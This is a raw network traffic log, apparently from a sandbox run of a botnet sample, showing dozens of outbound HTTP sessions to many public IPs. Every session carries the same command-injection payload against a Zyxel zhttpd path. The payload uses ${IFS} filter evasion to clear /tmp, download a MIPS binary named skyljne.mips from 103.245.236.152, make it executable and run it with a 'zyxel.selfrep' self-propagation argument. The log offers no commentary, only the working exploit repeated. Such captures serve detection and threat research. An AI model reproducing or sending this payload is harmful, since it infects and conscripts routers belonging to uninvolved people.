                                            Jan 14, 2024 15:50:42.474280119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5335192.168.2.2340006209.160.250.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474303007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5336192.168.2.2357092186.225.206.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474327087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5337192.168.2.233383417.139.85.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474376917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5338192.168.2.2346062161.69.3.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474402905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5339192.168.2.23505745.114.147.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474445105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5340192.168.2.2355752163.170.209.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474461079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5341192.168.2.2356750135.192.97.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474505901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5342192.168.2.234638875.197.193.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474560022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5343192.168.2.234777687.203.231.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474565029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5344192.168.2.2358132132.219.217.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489000082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5345192.168.2.2352504139.133.47.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489013910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5346192.168.2.2344756160.156.217.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489034891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5347192.168.2.2343672222.78.109.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489048004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5348192.168.2.2342244151.23.127.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489087105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5349192.168.2.233322469.153.205.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489130020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5350192.168.2.2349706154.133.200.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489147902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5351192.168.2.2358742171.26.40.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489170074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5352192.168.2.235762824.11.191.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489191055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5353192.168.2.2340220145.158.21.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489250898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5354192.168.2.234726287.56.104.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489275932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5355192.168.2.233455099.220.220.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489300013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5356192.168.2.2342202188.139.127.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489320993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5357192.168.2.235161494.0.255.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489358902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5358192.168.2.2349158129.254.82.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489365101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5359192.168.2.233328446.241.28.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489408016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5360192.168.2.2345496160.172.49.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489427090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5361192.168.2.2345916122.11.113.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489456892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5362192.168.2.2358952168.127.60.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489483118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5363192.168.2.2337414210.242.128.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489492893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5364192.168.2.23476549.22.111.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489522934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5365192.168.2.235244087.138.83.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489554882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5366192.168.2.2351376165.226.102.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489598989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5367192.168.2.2360216155.193.105.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489629984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5368192.168.2.2334140175.169.89.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489651918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5369192.168.2.233343618.95.208.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489667892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5370192.168.2.2360262146.247.239.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489702940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5371192.168.2.2346098193.178.167.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489737034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5372192.168.2.234286040.113.156.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489800930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5373192.168.2.235862472.76.126.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489810944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5374192.168.2.235417024.192.143.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489864111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5375192.168.2.233836812.124.79.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489881992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5376192.168.2.235496027.148.251.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489923000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5377192.168.2.235066834.171.230.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489952087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5378192.168.2.2354856140.92.92.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.489989996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5379192.168.2.2332788169.40.98.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490011930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5380192.168.2.2337806171.77.149.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490048885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5381192.168.2.235555460.40.38.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490073919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5382192.168.2.234965298.146.237.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490107059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5383192.168.2.23335002.169.19.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490129948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5384192.168.2.2356010179.38.199.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490176916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5385192.168.2.235535692.218.130.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490222931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5386192.168.2.2341748171.28.56.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490237951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5387192.168.2.235682643.154.246.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490276098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5388192.168.2.2352136120.178.237.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490300894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5389192.168.2.234758854.165.108.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490338087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5390192.168.2.2333688106.236.172.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490372896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5391192.168.2.2356438122.16.217.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490392923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5392192.168.2.2344084140.89.164.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490432024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5393192.168.2.2354800219.46.152.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490473032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5394192.168.2.235728620.98.239.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490493059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5395192.168.2.2334794114.112.49.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490526915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5396192.168.2.2332828148.2.167.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490571976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5397192.168.2.234586677.243.33.51443
                                            TimestampBytes transferredDirectionData
